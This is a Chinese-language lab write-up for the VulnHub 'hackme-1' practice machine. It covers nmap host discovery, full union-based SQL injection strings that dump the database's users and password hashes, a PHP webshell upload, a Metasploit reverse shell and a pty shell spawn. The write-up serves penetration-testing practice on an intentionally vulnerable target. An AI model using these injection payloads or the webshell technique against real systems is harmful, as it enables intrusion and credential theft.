一、靶场介绍
1.下载地址:https://www.vulnhub.com/entry/hackme-1,330/
2.将靶机网络适配器改为仅主机模式
3. 启动靶机
二、信息收集
1、主机发现
nmap -sn 192.168.139.1/24
2.查看端口开放情况,发现其22、80端口开放
nmap 192.168.139.128
3.靶机目录扫描
三、渗透流程
sql注入
1、登录主页发现登录页面,而且还可以注册用户
2.注册用户:admin/123456
3.登录
4.查看是否有sql注入,点击search可以查看所有信息
5.验证sql注入 Windows OS' and 1=1#
Windows OS' and 1=2#,由此看出存在字符型(单引号)sql注入
6.判断字段数 Windows OS' order by 3#
Windows OS' order by 4#,判断字符数为3
7.判断显示位置:-1' union select 1,2,3#
8.查看当前数据库位置:-1' union select database(),2,3#
9.查看webapphacking库所有的表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#
10.查看users表中所有的列 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
11.查看表中user,password字段数据:-1' union select group_concat(user),group_concat(pasword),3 from users#
12.将密码进行MD5解密
四、文件上传
1.使用superadmin用户登录 密码:Uncrackable,发现其存在文件上传
2.上传phpinfo文件进行验证,发现上传成功
3.尝试上传一句话木马,页面回显空白,上传成功
4.尝试使用蚁剑连接
5.Kali生成木马文件
6.将木马文件上传至靶机中
7.kali开启msf监听
8.蚁剑中运行木马文件
9.成功获取shell
10.切换到shell,输入whoami可查看具体信息
11.获取shell后切换到python终端,输入python -c 'import pty;pty.spawn("/bin/bash")'
12.跳转到home/legacy目录下,ls发现 ./touchmenot文件